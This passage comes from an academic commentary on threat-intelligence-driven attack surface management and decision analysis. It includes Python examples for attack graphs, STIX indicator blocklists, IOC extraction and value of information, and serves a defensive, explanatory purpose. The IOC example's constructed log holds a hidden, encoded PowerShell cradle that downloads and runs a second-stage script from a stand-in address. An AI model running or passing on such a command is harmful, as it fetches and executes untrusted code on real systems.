CTI-ASM may ingest real-time CTI indicator feeds by using the Trusted Automated Exchange of Intelligence Information (TAXII) application protocol to transmit STIX data from a TAXII server (cf. CIS, 2021d). It also uses "attacker behavior modeling" to understand attack schemes and improve detection and analytic competencies (cf. Elitzur et al., 2019, p. 41). Using threat modeling, CTI-ASM helps focus on what an adversary wants to target (cf. Godyla & Nickels, 2021), such as by generating probabilistic attack graphs from CTI data (Gylling et al., 2021). Probabilistic modeling of this kind has helped stop ransomware actors just two minutes into an attack (Microsoft, 2021a).

A CTI-ASM architecture built on an XDR solution with SOAR capabilities and a zero trust architecture supplies cyber situational awareness of events (Doherty & McKenney, 2021, p. 3) to reduce the AS. This architecture continuously watches assets for insights and anomalous patterns, grows telemetry to increase visibility of the evolving holdings of all types, and prioritizes based on risk analyses informed by current information on active threat actors and technical attack techniques (cf. Open Group, 2021).
By understanding attack flows rather than focusing on one specific action at a time, CTI-ASM helps compose realistic adversary simulation scenarios (cf. CTID, 2022). In addition, understanding the impact of CVEs (Common Vulnerabilities and Exposures) through the lens of ATT&CK adversary behaviors within CTI-ASM may supply the necessary context (CTID, 2021c). Specifically, knowing how adversaries use specific vulnerabilities to achieve their goals helps prioritize those vulnerabilities according to the actual risk in the defender's environment (CTID, 2021c).
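As an added example serving both the probabilistic attack graph passage earlier and the CVE-through-ATT&CK prioritization just described (it is not the Gylling et al. tooling or the CTID mapping), the following builds a small attack graph whose edges are ATT&CK techniques carrying CTI-derived success probabilities, finds the most likely path to impact, computes the exact probability that impact is reachable, and ranks CVEs by how much removing the steps they enable lowers that probability. Hosts, probabilities, the CVE-0000-000x identifiers and their CVSS scores are constructed; pairing CVE-2021-44228 (Log4Shell) with T1190 is this example's own assumption.

```python
"""Probabilistic attack graph from CTI, with CVE prioritisation through ATT&CK behaviours.

Added example; not the Gylling et al. tooling or the CTID mapping. Nodes are states of an
intrusion, edges are ATT&CK techniques carrying the probability that the step succeeds.
The hosts, probabilities, constructed CVE identifiers (CVE-0000-000x) and the CVSS scores
for them are made up. CVE-2021-44228 is Log4Shell and T1190 is ATT&CK Exploit Public-Facing
Application; mapping one to the other is an assumption of this example.
"""
import heapq
import math

# (from_state, to_state, technique, success_probability, cve_enabling_the_step_or_None)
EDGES = [
    ("internet", "web-dmz", "T1190", 0.85, "CVE-2021-44228"),       # Log4Shell on an edge app
    ("internet", "workstation", "T1566", 0.40, None),                # phishing
    ("web-dmz", "app-server", "T1210", 0.50, "CVE-0000-0001"),       # exploit of a remote service
    ("web-dmz", "app-server", "T1078", 0.35, None),                  # credentials found in a config
    ("workstation", "app-server", "T1021", 0.60, None),              # remote services
    ("app-server", "domain-admin", "T1078", 0.30, None),             # valid accounts
    ("app-server", "domain-admin", "T1068", 0.45, "CVE-0000-0002"),  # local privilege escalation
    ("domain-admin", "impact", "T1486", 0.95, None),                 # data encrypted for impact
]
CVSS = {"CVE-2021-44228": 10.0, "CVE-0000-0001": 9.8, "CVE-0000-0002": 7.8}  # last two constructed


def most_likely_path(edges, start="internet", goal="impact"):
    """Single most probable path: Dijkstra on -log(p), so costs add while probabilities multiply."""
    adj = {}
    for src, dst, tech, p, _ in edges:
        adj.setdefault(src, []).append((dst, tech, -math.log(p)))
    best = {start: 0.0}
    heap = [(0.0, start, [])]
    while heap:
        cost, node, path = heapq.heappop(heap)
        if node == goal:
            return math.exp(-cost), path
        if cost > best.get(node, math.inf):
            continue
        for dst, tech, w in adj.get(node, []):
            if cost + w < best.get(dst, math.inf):
                best[dst] = cost + w
                heapq.heappush(heap, (cost + w, dst, path + [tech]))
    return 0.0, []


def _reachable(adj, start, goal):
    seen, stack = set(), [start]
    while stack:
        node = stack.pop()
        if node == goal:
            return True
        if node not in seen:
            seen.add(node)
            stack.extend(adj.get(node, []))
    return False


def compromise_probability(edges, start="internet", goal="impact"):
    """Exact P(goal reachable), enumerating every success/failure outcome of the edges.
    Exponential in the edge count, so only for small graphs like this one."""
    total = 0.0
    for mask in range(1 << len(edges)):
        prob, adj = 1.0, {}
        for i, (src, dst, _, p, _) in enumerate(edges):
            if mask >> i & 1:
                prob *= p
                adj.setdefault(src, []).append(dst)
            else:
                prob *= 1 - p
        if _reachable(adj, start, goal):
            total += prob
    return total


def prioritise_cves(edges):
    """Rank CVEs by how much patching each (removing its edges) lowers P(goal)."""
    baseline = compromise_probability(edges)
    ranked = []
    for cve in sorted({e[4] for e in edges if e[4]}):
        remaining = [e for e in edges if e[4] != cve]
        ranked.append((cve, baseline - compromise_probability(remaining)))
    return sorted(ranked, key=lambda x: -x[1])


if __name__ == "__main__":
    prob, path = most_likely_path(EDGES)
    print(f"most likely path {' -> '.join(path)} (p={prob:.3f})")
    print(f"P(impact reachable) = {compromise_probability(EDGES):.3f}")
    for cve, drop in prioritise_cves(EDGES):
        print(f"{cve}: CVSS {CVSS[cve]:4.1f}, patching lowers P(impact) by {drop:.3f}")
```

Run it and the constructed privilege-escalation CVE, with the lowest CVSS of the three, ranks above the CVSS 9.8 service exploit, because a second route into the application server (credentials in a config file) blunts the value of patching the service. That is the "actual risk in the defender's environment" ordering rather than a severity-score ordering. The exhaustive enumeration is exact but exponential; for graphs of realistic size one samples outcomes instead.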
The increased situational awareness from CTI-ASM helps minimize the enterprise AS (Mavroeidis et al., 2021, p. 328). By swiftly connecting observed behaviors and characteristics to threat actors, CTI-ASM may supply indispensable insights that enable organizations to counter attacks, because how an attack progresses depends on the adversary's goals and TTPs (Microsoft, 2021a). For instance, if an election office shares a malicious IP (Internet Protocol) address through an indicator sharing program, other election offices can add it to a firewall block list and prevent the same attack within seconds (CIS, 2021b).
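As an added example (not CIS, Microsoft or any TAXII server's code) covering both the STIX/TAXII ingestion described earlier and the indicator-sharing case above, the following parses a constructed STIX 2.1 envelope of the kind a TAXII 2.1 collection's objects endpoint returns, keeps the indicators that are still valid and confident enough, attaches the Course of Action objects that "mitigate" them, and emits block-list entries. The UUIDs, RFC 5737 test addresses and example domains are made up, and the transport (an authenticated HTTPS GET against the collection) is left out so that the code runs offline.

```python
"""Turn a STIX 2.1 envelope, as a TAXII 2.1 collection returns it, into block-list entries.

Added example; it is not CIS, Microsoft or any TAXII server's code. The envelope below is
constructed: RFC 5737 test addresses, example domains and made-up UUIDs. Only the simple
single-comparison STIX patterns shown are handled; others are reported as unsupported
rather than silently dropped.
"""
import json
import re
from datetime import datetime, timezone

AS_OF = datetime(2022, 7, 25, tzinfo=timezone.utc)  # evaluation time used in the demo

ENVELOPE_JSON = json.dumps({"objects": [
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--11111111-1111-4111-8111-111111111111",
     "created": "2022-06-01T00:00:00Z", "modified": "2022-06-01T00:00:00Z",
     "name": "C2 address seen in phishing campaign", "confidence": 85,
     "pattern_type": "stix", "pattern": "[ipv4-addr:value = '198.51.100.7']",
     "valid_from": "2022-06-01T00:00:00Z", "valid_until": "2099-01-01T00:00:00Z"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--22222222-2222-4222-8222-222222222222",
     "created": "2021-01-01T00:00:00Z", "modified": "2021-01-01T00:00:00Z",
     "name": "Retired staging domain", "confidence": 70,
     "pattern_type": "stix", "pattern": "[domain-name:value = 'login-example.net']",
     "valid_from": "2021-01-01T00:00:00Z", "valid_until": "2021-02-01T00:00:00Z"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--33333333-3333-4333-8333-333333333333",
     "created": "2022-06-01T00:00:00Z", "modified": "2022-06-01T00:00:00Z",
     "name": "Dropper hash", "confidence": 90, "pattern_type": "stix",
     "pattern": "[file:hashes.'SHA-256' = '" + "a" * 64 + "']",
     "valid_from": "2022-06-01T00:00:00Z"},
    {"type": "indicator", "spec_version": "2.1",
     "id": "indicator--44444444-4444-4444-8444-444444444444",
     "created": "2022-06-01T00:00:00Z", "modified": "2022-06-01T00:00:00Z",
     "name": "Possibly shared hosting", "confidence": 20,
     "pattern_type": "stix", "pattern": "[domain-name:value = 'cdn-example.net']",
     "valid_from": "2022-06-01T00:00:00Z"},
    {"type": "course-of-action", "spec_version": "2.1",
     "id": "course-of-action--55555555-5555-4555-8555-555555555555",
     "created": "2022-06-01T00:00:00Z", "modified": "2022-06-01T00:00:00Z",
     "name": "Block at perimeter firewall"},
    {"type": "relationship", "spec_version": "2.1",
     "id": "relationship--66666666-6666-4666-8666-666666666666",
     "created": "2022-06-01T00:00:00Z", "modified": "2022-06-01T00:00:00Z",
     "relationship_type": "mitigates",
     "source_ref": "course-of-action--55555555-5555-4555-8555-555555555555",
     "target_ref": "indicator--11111111-1111-4111-8111-111111111111"},
]})

# Only single-comparison patterns on these observable types become block entries.
SIMPLE_PATTERN = re.compile(r"^\[(ipv4-addr|ipv6-addr|domain-name|url):value\s*=\s*'([^']+)'\]$")


def parse_ts(ts):
    """STIX timestamps are RFC 3339 with a trailing Z; return an aware datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def parse_simple_pattern(pattern):
    """Return (observable_type, value) for a supported pattern, else None."""
    m = SIMPLE_PATTERN.match(pattern.strip())
    return (m.group(1), m.group(2)) if m else None


def extract_blocks(envelope_json, now=None, min_confidence=50):
    """Split an envelope's indicators into block entries and the reasons others were skipped."""
    now = now or datetime.now(timezone.utc)
    objects = json.loads(envelope_json).get("objects", [])
    by_id = {o["id"]: o for o in objects if "id" in o}
    # Course-of-action names attached to indicators through 'mitigates' relationships.
    actions = {}
    for o in objects:
        if o.get("type") == "relationship" and o.get("relationship_type") == "mitigates":
            src = by_id.get(o.get("source_ref"), {})
            if src.get("type") == "course-of-action":
                actions.setdefault(o.get("target_ref"), []).append(src["name"])
    result = {"blocks": [], "expired": [], "unsupported": [], "low_confidence": []}
    for o in objects:
        if o.get("type") != "indicator" or o.get("pattern_type", "stix") != "stix":
            continue
        until = o.get("valid_until")
        if o.get("revoked") or (until and parse_ts(until) <= now):
            result["expired"].append(o["id"])
            continue
        parsed = parse_simple_pattern(o.get("pattern", ""))
        if parsed is None:
            result["unsupported"].append(o["id"])
            continue
        if o.get("confidence", 0) < min_confidence:  # an absent confidence is treated as 0
            result["low_confidence"].append(o["id"])
            continue
        kind, value = parsed
        result["blocks"].append({"kind": kind, "value": value, "indicator": o["id"],
                                 "actions": actions.get(o["id"], [])})
    return result


if __name__ == "__main__":
    out = extract_blocks(ENVELOPE_JSON, AS_OF)
    for entry in out["blocks"]:
        print(f"block {entry['kind']} {entry['value']} ({', '.join(entry['actions']) or 'no CoA'})")
    for reason in ("expired", "unsupported", "low_confidence"):
        print(reason, out[reason])
```

The expiry and confidence checks are what keep an automated feed from turning into a stale, over-broad block list, and the explicit unsupported bucket means a multi-comparison or hash pattern shows up for an analyst instead of vanishing. In production the envelope would come from an authenticated request to the collection's objects endpoint, paged with the envelope's "more" and "next" fields.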

By deploying CTI-ASM, defenders may apply attack surface reduction rules in a SIEM (Security Information and Event Management) system or XDR to help prioritize vulnerabilities and misconfigurations and to block entry vectors and lateral movement more effectively (Microsoft, 2022i; Microsoft, 2022d). For instance, CTI-ASM may apply such rules in response to the critical remote code execution vulnerability in specific versions of the Apache Log4j software library (Log4Shell), which adversaries have used to take control of many affected systems (CISA, n.d.). In addition, CTI-ASM may inform defenders of incidents that need further scoping (Microsoft, 2022d).

CTI-ASM may curate threat indicator feeds using a CTI platform that loads them into a SIEM or XDR-SOAR (Microsoft, 2021d) to provide context, alongside artifacts and other telemetry data, for understanding how to improve resiliency.


There are tools to enrich and help visualize CTI-ASM data, such as the msticpy set of Python tools (MSTIC, 2021). Much of the msticpy package is agnostic to the data source. Microsoft designed msticpy for use in Jupyter notebooks. Jupyter is an interactive development and data manipulation environment hosted in a browser that returns the output of the code it executes from what a user types into a cell (Microsoft, 2019).

Msticpy includes data providers and pre-built queries for easy access to security data stores, CTI, and geolocation lookups, together with analysis functions that supply context (e.g., clustering, time series analysis, anomaly identification, base64 decoding, and IOC pattern extraction). With msticpy, CTI-ASM analysts can pivot from one indicator to derive additional indicators for context and use the CTI lookup class to search for one or more indicators of compromise (IOC) across one or more CTI providers. Msticpy also includes mechanisms to visualize event timelines, process trees, maps, charts, and time series (Microsoft, 2019).
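To show what the IOC pattern extraction, base64 decoding and pivoting just described amount to, here is an added stdlib stand-in; it is not msticpy code, and its regular expressions are deliberately narrower than msticpy's IoCExtract. The three telemetry lines are constructed (RFC 5737 test addresses, an example domain, the SHA-256 of an empty file), and the encoded command is built from the plaintext shown the way a PowerShell -EncodedCommand argument is (UTF-16LE, then base64), so the decode step is a genuine pivot from one indicator to others.

```python
"""Stdlib stand-in for the IOC extraction and base64 decoding that msticpy offers.

Added example; it is not msticpy code and its regular expressions are deliberately narrow.
The three log lines are constructed (TEST-NET addresses, an example domain, the SHA-256 of
an empty file); the encoded command is built here from the plaintext shown, the way a
PowerShell -EncodedCommand argument is (UTF-16LE, then base64).
"""
import base64
import re

PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/stage2.ps1')"
ENCODED = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")

EVENTS = [  # constructed endpoint telemetry
    "2022-07-20T10:15:02Z host=ws-17 proc=powershell.exe cmd=powershell.exe -nop -w hidden -enc " + ENCODED,
    "2022-07-20T10:15:09Z host=ws-17 dns query evil-updates-example.net -> 198.51.100.7",
    "2022-07-20T10:15:40Z host=ws-17 file written sha256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
]

PATTERNS = {
    "url": re.compile(r"https?://[^\s'\"<>()]+"),
    "sha256": re.compile(r"\b[A-Fa-f0-9]{64}\b"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    # lowercase host names only; file names such as powershell.exe are filtered out below
    "domain": re.compile(r"\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}\b"),
}
BASE64_BLOB = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}")
FILE_EXTENSIONS = {"exe", "dll", "ps1", "bat", "txt", "log"}


def valid_ipv4(s):
    return all(0 <= int(octet) <= 255 for octet in s.split("."))


def decode_blob(blob):
    """Decode base64 to text if it is printable ASCII as UTF-16LE or UTF-8; else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and all(ch.isascii() and (ch.isprintable() or ch in "\r\n\t") for ch in text):
            return text
    return None


def extract_iocs(text, depth=1):
    """Extract IOCs from text, following base64 blobs one level down (the pivot)."""
    found = {kind: set() for kind in PATTERNS}
    found["decoded"] = set()
    for kind, pattern in PATTERNS.items():
        for match in pattern.findall(text):
            if kind == "ipv4" and not valid_ipv4(match):
                continue
            if kind == "domain" and match.rsplit(".", 1)[-1] in FILE_EXTENSIONS:
                continue
            found[kind].add(match)
    if depth > 0:
        for blob in BASE64_BLOB.findall(text):
            if re.fullmatch(r"[A-Fa-f0-9]+", blob):  # hex hashes share the base64 alphabet
                continue
            decoded = decode_blob(blob)
            if decoded:
                found["decoded"].add(decoded)
                for kind, values in extract_iocs(decoded, depth - 1).items():
                    found[kind] |= values
    return found


def hunt(events):
    """Aggregate sorted IOC lists across event lines."""
    merged = {kind: set() for kind in list(PATTERNS) + ["decoded"]}
    for line in events:
        for kind, values in extract_iocs(line).items():
            merged[kind] |= values
    return {kind: sorted(values) for kind, values in merged.items()}


if __name__ == "__main__":
    for kind, values in hunt(EVENTS).items():
        print(kind, values)
```

The second-stage URL and its address never appear in the raw telemetry; they surface only because the encoded command is decoded and re-scanned, which is the pivot the text describes. The ASCII check on the decoded bytes matters: arbitrary binary decoded as UTF-16LE produces printable but meaningless characters, so printability alone is not enough evidence of a real command line.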

6. Applicability of decision analysis


Analysts may apply several DA concepts to improve the quality of CTI and CTI-
ASM.

DA tools may help ensure that CTI-ASM incorporates an appropriate risk attitude (cf. Howard & Abbas, 2016, ch. 11). They also help ensure that CTI-ASM priorities reflect a unified corporate risk tolerance rather than the risk tolerance of particular individuals within the organization, which differs depending on where the individual sits (Howard & Abbas, 2016, pp. 781-85). While gathering the relevant risk information and organizational data may be a significant struggle at first, this material can be reused resourcefully and refreshed only intermittently (Spring, 2022).

DA relevance diagrams may help represent the current state of information and assert irrelevance relations to avoid logical errors in assessments (cf. Howard & Abbas, 2016, ch. 7). Also, while information gathering is necessary for CTI, DA can place a value on even imperfect information, to avoid wasteful gathering and to ensure that the information is relevant and material and that its value exceeds its cost (Howard & Abbas, 2016, ch. 13).


Distinctions made in CTI should help reach decision clarity; many observable differences are not particularly useful because they supply no benefit to the decision (Howard & Abbas, 2016, pp. 84-85). Possibility trees representing multiple distinctions, from a single degree to compound possibilities, may help drive clarity (Howard & Abbas, 2016, p. 87).
CTI deals with measures of belief, or probabilities, that depend on the state of information. Therefore, probability trees may help graphically divide certainty across many distinctions, each having multiple degrees. An assessment may change upon learning that certain degrees of other distinctions have occurred (Howard & Abbas, 2016, ch. 6). Sensitivity analysis may help decide whether more investigation is necessary and may clarify how the assessment would change if certain elements of the decision basis changed (Howard & Abbas, 2016, ch. 12).

CTI often relies on multiple sources of information, requiring an assessment of the relevance relations between them, because the value of joint information can be greater than, less than, or equal to the sum of the value of information from the individual sources (Howard & Abbas, 2016, p. 397). DA relevance diagrams and probability trees may help in this regard as well (Howard & Abbas, 2016, ch. 18).
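The value-of-information and sensitivity ideas in the preceding paragraphs, worked as an added example (not taken from Howard & Abbas) on a CTI-flavoured decision: patch a vulnerability now at a known cost, or defer it and risk a loss. All numbers are constructed, in arbitrary cost units, and the CTI source with a 90% true-positive and 15% false-positive alert rate is hypothetical.

```python
"""Value of clairvoyance and of an imperfect CTI source for a patch-now-or-defer decision.

Added worked example of the Howard & Abbas value-of-information and sensitivity ideas
applied to CTI; all numbers are constructed (costs in arbitrary units) and the two
actions and the CTI source are hypothetical.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class PatchDecision:
    p_exploit: float   # prior P(the vulnerability is exploited against us before the next cycle)
    loss: float        # loss if that happens while we are unpatched
    patch_cost: float  # cost of an emergency patch now (change window, downtime, testing)

    def value(self, action, p=None):
        """Expected value (a negative cost) of an action under belief p."""
        p = self.p_exploit if p is None else p
        return -self.patch_cost if action == "patch" else -p * self.loss

    def best(self, p=None):
        """The action with the higher expected value under belief p."""
        return max(("patch", "defer"), key=lambda action: self.value(action, p))

    def value_of_clairvoyance(self):
        """Upper bound on what any intelligence is worth: decide knowing the outcome."""
        informed = (self.p_exploit * self.value(self.best(1.0), 1.0)
                    + (1 - self.p_exploit) * self.value(self.best(0.0), 0.0))
        return informed - self.value(self.best())

    def value_of_source(self, tpr, fpr):
        """Value of a CTI source with P(alert | exploited) = tpr and P(alert | not) = fpr:
        update the prior on each possible report (Bayes), act on the posterior, average."""
        p = self.p_exploit
        p_alert = p * tpr + (1 - p) * fpr
        informed = 0.0
        for p_report, likelihood in ((p_alert, tpr), (1 - p_alert, 1 - tpr)):
            if p_report == 0:
                continue
            posterior = p * likelihood / p_report
            informed += p_report * self.value(self.best(posterior), posterior)
        return informed - self.value(self.best())

    def flip_point(self):
        """Sensitivity: the prior above which patching now beats deferring."""
        return self.patch_cost / self.loss


if __name__ == "__main__":
    d = PatchDecision(p_exploit=0.2, loss=500.0, patch_cost=60.0)
    print("act now:", d.best(), "flip point:", d.flip_point())
    print("value of clairvoyance:", d.value_of_clairvoyance())
    print("value of a 90%/15% feed:", d.value_of_source(tpr=0.9, fpr=0.15))
    print("value of a coin-flip feed:", d.value_of_source(tpr=0.5, fpr=0.5))
```

With these numbers the hypothetical source is worth 32 units per decision against a clairvoyance bound of 48, so a feed priced above that is the wasteful gathering the text warns about, and a source whose alerts are no better than chance is worth exactly nothing however cheap it is. flip_point reports the prior (0.12 here) at which the recommendation changes, which is the figure a sensitivity analysis hands to the decision-maker.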

The methodology of generating CTI assessments, much like DA, requires careful attention to cognition, the process that turns perceptions into beliefs (cf. Howard & Abbas, 2016, p. 351). Cognitive psychology identifies several ways in which opinions come to reflect perceptions improperly. One is wishful thinking: forming beliefs based on what should be rather than on evidence, and letting a particular worldview affect the thinking process (Howard & Abbas, 2016, p. 351). Another is misuse of the availability heuristic, by which the easier it is to think of an event, the more likely it seems, as when recent information causes events to be blown out of proportion (Howard & Abbas, 2016, p. 351). Another thinking error is estimating probabilities from often incorrect similarity judgments that misinterpret the effect of uncertainty, rather than first separating prior information from new evidence and then processing the data using probability theory (Howard & Abbas, 2016, p. 352). A further cognitive bias relevant to CTI is forming beliefs prematurely, letting first ideas play too large a role in the final assessment (cf. Howard & Abbas, 2016, p. 353).


Like DA, CTI must consider the tendency to implicitly condition probabilities on the occurrence of uncertain events (cf. Howard & Abbas, 2016, p. 354). Also like DA, CTI must safeguard against the hidden effects of subconscious motivation, such as when self-interest influences beliefs (cf. Howard & Abbas, 2016, p. 355). Motivational biases can also occur within CTI teams, where differing incentive structures tend to influence assessments unless thought processes are scrutinized for bias (cf. Howard & Abbas, 2016, p. 785).

"While there is no definitive index, over 200 cognitive biases have been identified in psychology, sociology, and management research." (Mohanani et al., 2020, sec. 1). Being aware of cognitive biases is essential because they can affect the quality of CTI and of CTI-ASM.

7. Conclusion
This commentary offers a conceptual framework of CTI-ASM to improve cyber resiliency. It will hopefully also encourage researchers to explore CTI-ASM further and thus serve as a basis for future research.

Empirical research is needed to study CTI-ASM in its real-world contexts by collaborating with defenders applying CTI-ASM in day-to-day work.

Future research may include a systematic literature review (Siddaway et al., 2019) of DA case studies that apply relevance diagrams, examine corporate risk attitudes, weigh imperfect information, use possibility and probability trees or sensitivity analysis, or address cognitive and motivational biases. Based on the review, research may experiment to test the hypothesis that bridging the gap between DA and CTI-ASM would improve the quality of CTI-ASM and CTI.

Acknowledgements


Thanks to all my Microsoft colleagues for valuable feedback and to Mark Seiden and Jonathan Spring, who helped me improve this commentary's quality. Views expressed do not necessarily reflect the opinions of Microsoft or any contributor.

References

Ahmed, D. (2022, July 21). Critical vulnerability in popular GPS tracker lets hackers remotely control vehicles. HACKREAD. https://www.hackread.com/vulnerability-gps-tracker-hackers-remotely-control-vehicles/
Badhwar, R. (2021). Dynamic measurement of cyber risk. In The CISO's next frontier. doi.org/10.1007/978-3-030-75354-2_40
Barrett, M. (2018). Framework for improving critical infrastructure cybersecurity, version 1.1 (NIST Cybersecurity Framework). NIST. doi.org/10.6028/NIST.CSWP.04162018
Beek, C. (2020). VirusTotal poisoning. perma.cc/NT4Q-UHQD
Bong, C. W., Holtby, D. W., & Ng, K. S. (2012). Fuzzy multicriteria decision analysis for measurement of document content reliability. 2012 Fifth International Symposium on Computational Intelligence and Design. doi.org/10.1109/iscid.2012.227
Brown, R., & Lee, R. M. (2019). The evolution of cyber threat intelligence (CTI): 2019 SANS CTI survey. SANS Institute. perma.cc/BA3A-ZVSS
Center for Internet Security Intel & Analysis Working Group [Security Intel]. (n.d.). What is cyber threat intelligence? [Blog post]. perma.cc/5P7X-GSBW
Center for Internet Security [CIS]. (2021, January 12) [2021a]. Automated cyber threat intelligence pilot reduced states' response times to minutes [Blog post]. perma.cc/7JQ3-NVBE
Central Intelligence Agency [CIA]. (n.d.). United States. The World Factbook. cia.gov/the-world-factbook/countries/united-states/#people-and-society (last updated June 15, 2022)

CIS. (2021, June 15) [2021b]. Cybersecurity spotlight: Cyber threat indicator sharing [Blog post]. perma.cc/9T34-DVFK
CIS. (2021, June 25) [2021c]. A new vision for cyber threat intelligence at the MS-ISAC [Blog post]. perma.cc/C3HN-S7CS
CIS. (2021, November 19) [2021d]. Real-time indicator feeds [Blog post]. perma.cc/Q2RD-NG7J
Center for Threat-Informed Defense [CTID]. (2021, May 3) [2021a]. ATT&CK for containers. perma.cc/RKM7-UUCZ
CTID. (2021, October 14) [2021b]. ATT&CK Workbench. perma.cc/ZN7H-3BQ8
CTID. (2021, October 28) [2021c]. Mapping ATT&CK to CVE for impact. perma.cc/EN4V-XU9A
CTID. (2022, March 2). Attack Flow. perma.cc/VF3Y-EB4H
Cybersecurity and Infrastructure Security Agency [CISA]. (n.d.). Apache Log4j vulnerability guidance. perma.cc/3637-MSGB
Collier, Z. A., DiMase, D., Walters, S., Tehranipoor, M. M., Lambert, J. H., & Linkov, I. (2014). Cybersecurity standards: Managing risk and creating resilience. Computer, 47(9), 70-76. doi.org/10.1109/mc.2013.448
Committee of Sponsoring Organizations of the Treadway Commission [COSO]. (2017). Enterprise risk management: Integrating with strategy and performance. perma.cc/F4TV-P7BX
Davis Advisors, D. S. (2009). On success. Marceline, MO: Walsworth Publishing Company.
Dehghantanha, A., Conti, M., & Dargahi, T. (2019). Cyber threat intelligence. Springer.
Diogenes, Y., & Shinder, T. (2018). Microsoft Azure Security Center. Microsoft Press.
Diamond, T., Kerman, A., Souppaya, M., Stine, K., Johnson, B., Peloquin, C., Ruffin, V., Simon, M., Sweeney, S., & Scarfone, K. (2022). Improving enterprise patching for general IT systems: Utilizing existing tools and performing processes in better ways (NIST Special Publication 1800-31). NIST. doi.org/10.6028/NIST.SP.1800-31
Doerr, E. (2021, July 12). Microsoft to acquire RiskIQ to strengthen cybersecurity of digital transformation and hybrid work [Blog post]. perma.cc/Q4LN-ZA3Z

Doherty, D., & McKenney, B. (2021). Zero trust architectures: Are we there yet? (MITRE Technical Paper 21-1273). MITRE. perma.cc/FB27-7Q96
Dwivedi, A. (2018). Implementing cyber resilient designs through graph analytics assisted model-based systems engineering. 2018 IEEE International Conference on Software Quality, Reliability and Security Companion (QRS-C). doi.org/10.1109/qrs-c.2018.00106
Elitzur, A., Puzis, R., & Zilberman, P. (2019). Attack hypothesis generation. 2019 European Intelligence and Security Informatics Conference (EISIC). doi.org/10.1109/EISIC49498.2019.9108886
Estrin, E. (2022). Cloud security handbook. Packt Publishing.
Gartner Enterprise Risk Management Research Team [Gartner]. (2021, March 29) [2021a]. 2021 ERM risk response accelerator for cyber risks, topic guide: ERM's role and frameworks (ID No. G00743265). perma.cc/5HJV-ZZ3M [GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.]
Gartner. (2021, March 29) [2021b]. 2021 ERM risk response accelerator for cyber risks, topic guide: Controls, threats, and consequences (ID No. G00748842). perma.cc/Y85L-LRB4
Ginty, S. (2022, April 20). Discover the anatomy of an external cyberattack surface with new RiskIQ report. perma.cc/UH2F-9T4X
Godyla, N., & Nickels, K. (2021, June 22). Strategies, tools, and frameworks for building an effective threat intelligence team [Blog post]. perma.cc/MH5Q-MC6V
Gourisetti, S. N., Mylrea, M., & Patangia, H. (2020). Cybersecurity vulnerability mitigation framework through empirical paradigm (CyFEr): Prioritized gap analysis. IEEE Systems Journal, 14(2), 1897-1908. doi.org/10.1109/jsyst.2019.2913141
Gylling, A., Ekstedt, M., Afzal, Z., & Eliasson, P. (2021). Mapping cyber threat intelligence to probabilistic attack graphs. 2021 IEEE International Conference on Cyber Security and Resilience (CSR). doi.org/10.1109/csr51186.2021.9527970
Hallum, C. (2021, December 6). Protect printers, cameras, and the rest of your IoT devices starting today! [Microsoft blog post]. perma.cc/QZ4E-T7LY
Hamilton, E. (2021, July 20). What are cyber-physical attacks? The Science Times. perma.cc/3LT7-WK7E

Harvard Business Review [HBR]. (2021, July 19). Pulse survey: Cybersecurity in the era of intelligence and an expanding attack surface. HBR Analytic Services. perma.cc/HRC3-XRVK
Harvard Law School Forum on Corporate Governance [Harvard]. (2022, April 11). Proposed SEC cyber rules: A game changer for public companies. perma.cc/BXF6-6V7G
Heuer, R. J. (2019). Psychology of intelligence analysis. Pickle Partners Publishing.
Hong, Z., Li, S., & Yu, L. (2020). Accelerating update of approximations under a dominance relation. IEEE Access, 8, 146472-146482. doi.org/10.1109/access.2020.3015813
Howard, R. A., & Abbas, A. E. (2016). Foundations of decision analysis (Global ed.). Harlow, England: Pearson Education Limited.
Howard, R. A., & Matheson, J. E. (1989). Readings on the principles and applications of decision analysis (Vol. 1). SDG Decision Systems.
Hutchins, E. M., Cloppert, M. J., & Amin, R. M. (2011). Intelligence-driven computer network defense informed by analysis of adversary campaigns and intrusion kill chains. Leading Issues in Information Warfare & Security Research, 1, 80. perma.cc/DN4K-XQLE
IDC. (2022, April 27) [2022a]. Global cybersecurity market implications of the Russia-Ukraine war [Webinar]. perma.cc/U7AB-YLFK
IDC. (2022, May 12) [2022b]. Worldwide digital transformation investments forecast to reach $1.8 trillion in 2022, according to new IDC spending guide. perma.cc/UCQ3-KF4J
International Organization for Standardization [ISO]. (2020). Security and resilience: Business continuity management systems. Guidance on the use of ISO 22301 (ISO 22313:2020(E)). perma.cc/CT7K-BKN6
Jakkal, V. (2022, May 9). Building a safer world together with our partners: Introducing Microsoft Security Experts. perma.cc/3AYC-BZVT
Joint Task Force. (2018). Risk management framework for information systems and organizations (NIST Special Publication 800-37, Rev. 2). NIST. doi.org/10.6028/NIST.SP.800-37r2

Kazmi, S. A., & Naarananoja, M. (2014). Significance of management system for effective organizational management. GSTF International Journal on Business Review (GBR), 3(2). doi.org/10.7603/s40706-013-0022-2
Kriaa, S., & Chaabane, Y. (2021). SecKG: Leveraging attack detection and prediction using knowledge graphs. 2021 12th International Conference on Information and Communication Systems (ICICS). doi.org/10.1109/ICICS52457.2021.9464587
Kumar, S. (2022, March 3). Cybercrime: A clear and present danger. Security Magazine. perma.cc/6T7S-UCSS
Lee, R. M., & Brown, R. (2021). 2021 SANS cyber threat intelligence (CTI) survey. SANS Institute. perma.cc/SU9Z-BR44
